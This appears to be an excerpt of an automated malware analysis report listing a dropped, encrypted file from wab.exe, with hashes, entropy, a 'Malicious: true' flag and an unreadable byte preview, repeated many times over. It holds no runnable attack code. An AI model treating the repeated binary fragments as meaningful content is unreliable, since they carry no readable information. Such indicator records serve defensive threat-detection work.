                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
